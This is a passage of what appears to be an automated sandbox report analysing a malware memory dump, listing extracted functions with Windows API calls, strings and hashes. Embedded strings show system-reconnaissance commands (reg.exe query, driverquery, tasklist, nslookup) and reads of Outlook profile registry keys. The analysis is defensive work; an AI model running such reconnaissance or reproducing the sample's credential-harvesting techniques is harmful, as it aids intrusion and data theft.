Instruction Fuzzy Hash: BB0188716EA304FBE710ABA5DC45F6A3BACEB04741F00C017F705DA1A1D7745944EB51

Uniqueness

Uniqueness Score: -1.00%

Function 009C5195, Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009B4B29: lstrlen.KERNEL32(00000000,00000000,00000000,009BF1E8,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 009B4B2E
Part of subcall function 009B4B29: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 009B4B43
Part of subcall function 009B4B29: wsprintfA.USER32 ref: 009B4B58
Part of subcall function 009B4B29: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 009B4B74

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 009C51B9
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 009C51C8
CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 009C51D1
GetLastError.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 009C51D9

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: e078c520d79e5c91503629b10039e90c7086e64454da75f20f22b1abf875a019
Instruction ID: 531e0f48fe9c2c7818c64107b551575d664b298f50e41e2b1b7263ec09188634
Opcode Fuzzy Hash: e078c520d79e5c91503629b10039e90c7086e64454da75f20f22b1abf875a019
Instruction Fuzzy Hash: 27F0E930B996107AF21127F49C8EFBB125CDB45751F25061DF642A10D2CE94AC846262

Uniqueness

Uniqueness Score: -1.00%

Function 009BF454, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 009BF466

Part of subcall function 009C4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,009C1ED8), ref: 009C4282
Part of subcall function 009C4241: GetLastError.KERNEL32 ref: 009C428C
Part of subcall function 009C4241: WaitForSingleObject.KERNEL32(000000C8), ref: 009C42B1
Part of subcall function 009C4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 009C42D2
Part of subcall function 009C4241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 009C42FA
Part of subcall function 009C4241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 009C430F
Part of subcall function 009C4241: SetEndOfFile.KERNEL32(00000006), ref: 009C431C
Part of subcall function 009C4241: CloseHandle.KERNEL32(00000006), ref: 009C4334

WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,009BA1BE,.dll,?,00001000,?,?,?), ref: 009BF489
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,009BA1BE,.dll,?,00001000,?,?,?), ref: 009BF4AB
GetLastError.KERNEL32(?,009BA1BE,.dll,?,00001000,?,?,?), ref: 009BF4BF

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
Opcode ID: 7ae770001971bc698a1d0ce78f3116ea9f3cff6b195aeeaeeda65d38c0af6820
Instruction ID: ad2307daf90114b404a13161bc544154cba7e3909a723f9f1c0ede30d19ad502
Opcode Fuzzy Hash: 7ae770001971bc698a1d0ce78f3116ea9f3cff6b195aeeaeeda65d38c0af6820
Instruction Fuzzy Hash: ADF0A43128A204BBDB111F60DC1EFEB3B1AAF04720F104816F619951F1DB7594A5AB65

Uniqueness

Uniqueness Score: -1.00%

Function 009C7854, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 39stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,009BF7B7,004F0053,00000000), ref: 009C7860
memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,009BF7B7,004F0053,00000000), ref: 009C7888
memset.NTDLL ref: 009C789A

Strings

System, xrefs: 009C785A

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmemcpymemset
String ID: System
API String ID: 4042389641-3470857405
Opcode ID: 05f0994925cc50eacd716ff2df9782ac636668a57e794e5a624bdc518c6bf3b7
Instruction ID: 244588705910594b13af391cb47b60efe42a6076f62b8203d8d277d66b39b901
Opcode Fuzzy Hash: 05f0994925cc50eacd716ff2df9782ac636668a57e794e5a624bdc518c6bf3b7
Instruction Fuzzy Hash: 26F0B477D05214BBD7206BA99C89E9B7AACDBD4394B15442AFA0693201E971EE0486A0

Uniqueness

Uniqueness Score: -1.00%

Function 009CCEB4, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000012B,009B93AD,000000FF,06288900,?,?,009B815D,0000012B,06288900), ref: 009CCED0
GetLastError.KERNEL32(?,?,009B815D,0000012B,06288900,?,?,009C79A9,00000000,?), ref: 009CCEDB
WaitNamedPipeA.KERNEL32(00002710), ref: 009CCEFD
WaitForSingleObject.KERNEL32(00000000,?,?,009B815D,0000012B,06288900,?,?,009C79A9,00000000,?), ref: 009CCF0B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: cb5a84b4ac1204f66617f1c74823c3a224a92deb15f004d719a33820bc5e5491
Instruction ID: c8d4889059829dc5d602a75ae9432d8f5e5274d2c1690a8bcee78b1a80e63b4d
Opcode Fuzzy Hash: cb5a84b4ac1204f66617f1c74823c3a224a92deb15f004d719a33820bc5e5491
Instruction Fuzzy Hash: E7F06871A4E120ABD7301765EC4CF577F19EB053B1F11452AF50DE61E1C6714C84E691

Uniqueness

Uniqueness Score: -1.00%

Function 009B675E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,009B1CDF,00000000,00000000,?,?,00000000,?,?,?,009B1CDF,TorClient), ref: 009C6765
Part of subcall function 009C672D: RtlAllocateHeap.NTDLL(00000000,009B1CDF), ref: 009C6779
Part of subcall function 009C672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,009B1CDF,?,?,?,009B1CDF,TorClient,?,?), ref: 009C6793
Part of subcall function 009C672D: RegCloseKey.KERNELBASE(?,?,?,?,009B1CDF,TorClient,?,?), ref: 009C67BD

memcpy.NTDLL(009DD06C,?,00000028,00000000,Client,?,?,?,?,?,009D58E7,?,?,?,?,009B20D2), ref: 009B6790
HeapFree.KERNEL32(00000000,?,Client,?,?,?,?,?,009D58E7,?,?,?,?,009B20D2,?), ref: 009B67C1

Strings

Client, xrefs: 009B676B
(, xrefs: 009B6779

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: ($Client
API String ID: 1301464996-90774469
Opcode ID: cdfebf417163e0ea433aef67891acf1353ae9fcab6d0dc0eb482c8d2ae29dc46
Instruction ID: 86846f73f8ccd03cb3df44b6adfb3b889c6240fcd39720d03eee0a853ab9b7fb
Opcode Fuzzy Hash: cdfebf417163e0ea433aef67891acf1353ae9fcab6d0dc0eb482c8d2ae29dc46
Instruction Fuzzy Hash: 1BF0A472DD6304FBDB21AF80DD46F997B7CA794798F00401BFA01621D0DAB06985DF65

Uniqueness

Uniqueness Score: -1.00%

Function 009C84CA, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(06288D20), ref: 009C84D3
Sleep.KERNEL32(0000000A,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009C84DD
HeapFree.KERNEL32(00000000,?,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009C8505
RtlLeaveCriticalSection.NTDLL(06288D20), ref: 009C8523

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 13a03404e19651554fdf798820ca97931b9218efd767e53aa288fdbf2b21075f
Instruction ID: 62f50dd57a06a8ee8d5d8f29f0ec00b2e73934ebe332d3618be37ecae6c3acfa
Opcode Fuzzy Hash: 13a03404e19651554fdf798820ca97931b9218efd767e53aa288fdbf2b21075f
Instruction Fuzzy Hash: 82F054706AA240ABD7209F28DD48F5737A8AB10740F04840BF502C62B1CB30DC80E716

Uniqueness

Uniqueness Score: -1.00%

Function 009B9A6E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,009C1EE3,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 009B9A8C
wsprintfA.USER32 ref: 009B9AAA

Strings

%02u:%02u:%02u , xrefs: 009B9AA4

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: SystemTimewsprintf
String ID: %02u:%02u:%02u
API String ID: 425189169-982595855
Opcode ID: 31b46f693d24a0bb799b8c0375f62c64fd30e60321cc512974f66000b2d4e670
Instruction ID: 053c3fe40e9f002ecc47fa0314530a132fbefa83305f8fb998de83dc77b12030
Opcode Fuzzy Hash: 31b46f693d24a0bb799b8c0375f62c64fd30e60321cc512974f66000b2d4e670
Instruction Fuzzy Hash: 99211A75A55204AFCB10EB95DC49FBB77BCFB88705B00885AF901DB251D6B4A841DB70

Uniqueness

Uniqueness Score: -1.00%

Function 009CE18B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(4C44544E,?,00000000,009C77A8,00000000,00000000,?,00000B54), ref: 009CE1CD
memcpy.NTDLL(?,009DE148,00000018,7250775A,4772644C,4C72644C,?,00000B54), ref: 009CE249

Strings

t, xrefs: 009CE1CD

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HandleModulememcpy
String ID: t
API String ID: 1801490239-2238339752
Opcode ID: b9836f0050388181d68dc3c0d4d958316205cfada144b1dc7b8b856ac15ce7ca
Instruction ID: 6b550622deee8ff66a35c86fa59000d005646310f6029c95588462d9ef24756c
Opcode Fuzzy Hash: b9836f0050388181d68dc3c0d4d958316205cfada144b1dc7b8b856ac15ce7ca
Instruction Fuzzy Hash: 9E116372AAE1059FD310FFA4EC4AE5177F9A7A5300718442BE508CF371D230E8C5AB62

Uniqueness

Uniqueness Score: -1.00%

Function 009CE18F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(4C44544E,?,00000000,009C77A8,00000000,00000000,?,00000B54), ref: 009CE1CD
memcpy.NTDLL(?,009DE148,00000018,7250775A,4772644C,4C72644C,?,00000B54), ref: 009CE249

Strings

t, xrefs: 009CE1CD

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HandleModulememcpy
String ID: t
API String ID: 1801490239-2238339752
Opcode ID: 5c6167c68733463335b471fe220c3ee5609effb4fa31cc60d96cbc7c6a4b19c6
Instruction ID: 949196e75e1565fdd578d9f30b0a005a9b3cd0732de3c3ce57ee6247856f6866
Opcode Fuzzy Hash: 5c6167c68733463335b471fe220c3ee5609effb4fa31cc60d96cbc7c6a4b19c6
Instruction Fuzzy Hash: 85113072AAE1059FD710FFA8EC49E5177F9A7A5300708442BE109CB331D230E9C5AB62

Uniqueness

Uniqueness Score: -1.00%

Function 009C80EE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?), ref: 009C8132
StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 009C8144

Strings

0x, xrefs: 009C812C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID: 0x
API String ID: 3510742995-3225541890
Opcode ID: 9e80fa384551d5ed917e7b6b30a48adf38e6a193b80619cf4de2bfc4b58a838a
Instruction ID: 9d8fd5259df6002961a0559b401fd9161b5cf74d97aefc8e2896181f75525f54
Opcode Fuzzy Hash: 9e80fa384551d5ed917e7b6b30a48adf38e6a193b80619cf4de2bfc4b58a838a
Instruction Fuzzy Hash: 28015E35900209BBDB01DBA8DC45EAFBBB9EB84744F044415E904E7251EB70EA09C792

Uniqueness

Uniqueness Score: -1.00%

Function 009C0DCC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32( Fw,00000000,00000000,00000000,77E34620,00000000,009B5FE6,%userprofile%\AppData\Local\,?,00000000,009B23FE), ref: 009C0DDD

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,00000000,009B23FE), ref: 009C0DFA

Part of subcall function 009C4FB0: HeapFree.KERNEL32(00000000,00000200,009C6EB2,00000000,00000100,00000200), ref: 009C4FBC

Strings

Fw, xrefs: 009C0DD9

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: EnvironmentExpandHeapStrings$AllocateFree
String ID: Fw
API String ID: 1564683301-3200898389
Opcode ID: 2af716aaddc46ceef561b7068666015f3a392177c323bf3c4e167029b5795acc
Instruction ID: 7b8795c8cca3ea009abca638bd8d45ff88f0e2e6b23642a0bc360c9db24b6149
Opcode Fuzzy Hash: 2af716aaddc46ceef561b7068666015f3a392177c323bf3c4e167029b5795acc
Instruction Fuzzy Hash: 3EE0D833A42533B6423156AA9C44E4BDE9CDFE27E5741053AB944D3121DF20DC11D2F5

Uniqueness

Uniqueness Score: -1.00%

Function 009C713E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009B810A: RegCreateKeyA.ADVAPI32(80000001,06288900,?), ref: 009B811F
Part of subcall function 009B810A: lstrlen.KERNEL32(06288900,00000000,00000000,?,?,009C79A9,00000000,?), ref: 009B814D

RegSetValueExA.ADVAPI32(009D4AB1,Client,00000000,00000003,00000000,00000028,00000001,009D4AB1,06288D5C,00000057,?,?,009C71B4,009DD06C,009DD072,009CCE23), ref: 009C716B
RegCloseKey.ADVAPI32(009D4AB1,?,?,009C71B4,009DD06C,009DD072,009CCE23,00000000,00000000,00000000,?,?,009BF22B,06288D5C,770CC740,00000000), ref: 009C7176

Strings

Client, xrefs: 009C7163

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseCreateValuelstrlen
String ID: Client
API String ID: 1356686001-3236430179
Opcode ID: 8c463973adfa7ed840d10c975fb560cb6f79a6d4d2d78ceaeb8021db6b27a1c1
Instruction ID: 22898e198b0b27a2d3a8bbe6fa8c76ac444a1176369d9f34f1967d388b957330
Opcode Fuzzy Hash: 8c463973adfa7ed840d10c975fb560cb6f79a6d4d2d78ceaeb8021db6b27a1c1
Instruction Fuzzy Hash: 9DE09B33A96114BBDB115B94DD06EAEBBBCDB55754F014013FA00A7190D6B09E00D790

Uniqueness

Uniqueness Score: -1.00%

Function 009B48E3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\,00000000,00020019,?), ref: 009B48FD
RegCloseKey.ADVAPI32(?,?,?), ref: 009B4919

Strings

Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\, xrefs: 009B48F3

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
API String ID: 47109696-3083934730
Opcode ID: feb332a7c584bd7a81a944f34c0772b38c16ddcffbf89de8aca83d450767e342
Instruction ID: 914fce2f6e9e46f015edcd60492637a1446a36485329713d20859eec6b8a473f
Opcode Fuzzy Hash: feb332a7c584bd7a81a944f34c0772b38c16ddcffbf89de8aca83d450767e342
Instruction Fuzzy Hash: 3CE0DF76A41228BBCB115B90DC0AFDDBB68DB44794F000022FE00B2251D2B19E40B6D0

Uniqueness

Uniqueness Score: -1.00%

Function 009C61AA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\,00000000,00020019,?,00000008,?,?,009B6FF8,?,?,?,?), ref: 009C61C4
RegCloseKey.ADVAPI32(?,?,00000001,?,?,009B6FF8,?,?,?,?), ref: 009C61E0

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\, xrefs: 009C61BA

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
API String ID: 47109696-1895784063
Opcode ID: 27428dc1871a53391825b344ddd3206d43d645d70d8e98b1603de408849c013a
Instruction ID: 58f3e180f24287b8d1e2f34b1a6a5da5b2e14999eda8a7df7f513dc3acca9b4a
Opcode Fuzzy Hash: 27428dc1871a53391825b344ddd3206d43d645d70d8e98b1603de408849c013a
Instruction Fuzzy Hash: D0E0DF76A85228FBCB215B909C0AF9DBB68DB44794F004062FE00B2251D2B1CE00E6D0

Uniqueness

Uniqueness Score: -1.00%

Function 009CB945, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\,00000000,00020019,?,00000008,?,?,009B7000,?,?,?,?,?), ref: 009CB95F
RegCloseKey.ADVAPI32(?,?,00000001,?,?,009B7000,?,?,?,?,?), ref: 009CB97B

Strings

Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\, xrefs: 009CB955

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
API String ID: 47109696-316241766
Opcode ID: aad781d4a8e30fff096efc022729e490f1d33fc0e0908342a2e8d690e73ebec1
Instruction ID: 5af5387caa9f89e733634e7052a9ae2e5fb4b2e06583bed4921c95be0db1b89b
Opcode Fuzzy Hash: aad781d4a8e30fff096efc022729e490f1d33fc0e0908342a2e8d690e73ebec1
Instruction Fuzzy Hash: 29E0DF76A81228BBCF115B909C46F9DB778DB48754F010112FE00B2250D2B19E00A6D0

Uniqueness

Uniqueness Score: -1.00%

Function 009C7579, Relevance: 5.2, APIs: 4, Instructions: 234COMMON

Download Yara Rule

APIs

memcpy.NTDLL(-00000040,009C684B,00000800,00000000,00000000,?,00000B54), ref: 009C77BB

Part of subcall function 009C45CA: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,009B1440,?,?,?,?,009C7689,?,?,00000000,?,00000B54), ref: 009C45EF
Part of subcall function 009C45CA: GetProcAddress.KERNEL32(00000000,7243775A), ref: 009C4611
Part of subcall function 009C45CA: GetProcAddress.KERNEL32(00000000,614D775A), ref: 009C4627
Part of subcall function 009C45CA: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 009C463D
Part of subcall function 009C45CA: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 009C4653
Part of subcall function 009C45CA: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 009C4669

Part of subcall function 009B76AC: memcpy.NTDLL(?,?,?,?,00000000,?,00000000,00000000,?,?,00000000,?,00000B54), ref: 009B7712
Part of subcall function 009B76AC: memcpy.NTDLL(?,?,?), ref: 009B7771

memcpy.NTDLL(?,?,?,?,009B1440,00000000,00000000,00000000,?,?,00000000,?,00000B54), ref: 009C76E8
memcpy.NTDLL(00000018,?,00000018,?,009B1440,00000000,00000000,00000000,?,?,00000000,?,00000B54), ref: 009C7734
memset.NTDLL ref: 009C783B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AddressProcmemcpy$HandleModulememset
String ID:
API String ID: 2847270571-0
Opcode ID: 2c89f620bbee1555ad82d75d712367f84e614567413b339d79fc25555cfc58ba
Instruction ID: f44894aa1fb3584925ecba5b97ce7114162058d09fd2db9c2116a6df05b7d597
Opcode Fuzzy Hash: 2c89f620bbee1555ad82d75d712367f84e614567413b339d79fc25555cfc58ba
Instruction Fuzzy Hash: 2C913771E0420AEFCB10DF98C985FAEBBB8BF08304F14446DE915A7251D774AA94DF92

Uniqueness

Uniqueness Score: -1.00%

Function 009D0BC5, Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009D0C23
CloseHandle.KERNEL32(?,?,00000010,?,00000000,00000000,009B45A1,00000000), ref: 009D0C6E
HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,009CA4DB,00000000,009B45A1,009B23B1,00000000,009B45A1,009D2B6B,00000000,009B45A1,009D23B3,00000000), ref: 009D0F6A
GetLastError.KERNEL32(?,00000000,?), ref: 009D118C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: 3880e40879d3c7f443c48c99a871e0c57baf74e51e97f0044918076d5ca996e8
Instruction ID: 106a11e269360bacce1c67d991639f73fb706986304347f90a167ed6d9c3cf25
Opcode Fuzzy Hash: 3880e40879d3c7f443c48c99a871e0c57baf74e51e97f0044918076d5ca996e8
Instruction Fuzzy Hash: 67412E375CC208BADB216F64DD42FFF362DABC6750F20C627FA4161291CA748D51A663

Uniqueness

Uniqueness Score: -1.00%

Function 009CE3A4, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009CE3CA
memcpy.NTDLL ref: 009CE3F2

Part of subcall function 009B9DAC: RtlNtStatusToDosError.NTDLL(00000000), ref: 009B9DE4
Part of subcall function 009B9DAC: SetLastError.KERNEL32(00000000), ref: 009B9DEB

GetLastError.KERNEL32(00000010,00000218,009D6DDD,00000100,?,00000318,00000008), ref: 009CE409
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,009D6DDD,00000100), ref: 009CE4EC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Error$Last$Statusmemcpymemset
String ID:
API String ID: 1706616652-0
Opcode ID: 360982d6ee659657b5e06cfe5730d5082ff1719f9a5cc802473ea740b143c1e5
Instruction ID: 247f2feb8de3911e5d118e8a52f3a3b89f276601a80b2bf895e6b3a608bc26fb
Opcode Fuzzy Hash: 360982d6ee659657b5e06cfe5730d5082ff1719f9a5cc802473ea740b143c1e5
Instruction Fuzzy Hash: 654191B1A44301AFD724DF24DC41FABBBE9BB98310F00892DF599C62A1E730D9148B63

Uniqueness

Uniqueness Score: -1.00%

Function 009B1684, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C118D: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,009B16BA,?,?,?,?), ref: 009C11B1
Part of subcall function 009C118D: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 009C11C3
Part of subcall function 009C118D: wcstombs.NTDLL ref: 009C11D1
Part of subcall function 009C118D: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,009B16BA,?,?,?), ref: 009C11F5
Part of subcall function 009C118D: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 009C120A
Part of subcall function 009C118D: mbstowcs.NTDLL ref: 009C1217
Part of subcall function 009C118D: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,009B16BA,?,?,?,?,?), ref: 009C1229
Part of subcall function 009C118D: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,009B16BA,?,?,?,?,?), ref: 009C1243

GetLastError.KERNEL32 ref: 009B1723

Part of subcall function 009B18E3: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 009B199D
Part of subcall function 009B18E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 009B19BD
Part of subcall function 009B18E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 009B19C9

HeapFree.KERNEL32(00000000,?), ref: 009B173F
HeapFree.KERNEL32(00000000,?), ref: 009B1750
SetLastError.KERNEL32(00000000), ref: 009B1753

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: cd21211568c30f6aa4c90842cefd92c1306f3c598ea815841f8620ad195dbcd5
Instruction ID: e5d449a7aee5e890e48d69f30d060fd3874d2017dd3e638328b4abd0a6c63ab4
Opcode Fuzzy Hash: cd21211568c30f6aa4c90842cefd92c1306f3c598ea815841f8620ad195dbcd5
Instruction Fuzzy Hash: 67314936805208EFCF12AF99CD848DEBFB9FF44320B54855AF915A7261C7318A91EF90

Uniqueness

Uniqueness Score: -1.00%

Function 009C4FC5, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009BC550: lstrlen.KERNEL32(00000000,?,?,00000000,77E34620,?,00000001,00000001,?,009C11EE,?,?,?,?,?,00000000), ref: 009BC5A9
Part of subcall function 009BC550: lstrlen.KERNEL32(?,?,?,00000000,77E34620,?,00000001,00000001,?,009C11EE,?,?,?,?,?,00000000), ref: 009BC5C7
Part of subcall function 009BC550: RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 009BC5F0
Part of subcall function 009BC550: memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,009C11EE,?,?,?,?,?,00000000), ref: 009BC607
Part of subcall function 009BC550: HeapFree.KERNEL32(00000000,00000000), ref: 009BC61A
Part of subcall function 009BC550: memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,009C11EE,?,?,?,?,?,00000000), ref: 009BC629

GetLastError.KERNEL32 ref: 009C5064

Part of subcall function 009B18E3: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 009B199D
Part of subcall function 009B18E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 009B19BD
Part of subcall function 009B18E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 009B19C9

HeapFree.KERNEL32(00000000,?), ref: 009C5080
HeapFree.KERNEL32(00000000,?), ref: 009C5091
SetLastError.KERNEL32(00000000), ref: 009C5094

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
String ID:
API String ID: 2451549186-0
Opcode ID: 61025f7c9baaf5c3bee269bcfa59e4aca4133a68d0e57653d8166c36a1359c48
Instruction ID: 9b509b1b6dca9ced036cf0b2ed3294bf93deb2ed156a95548797befbf12f23bb
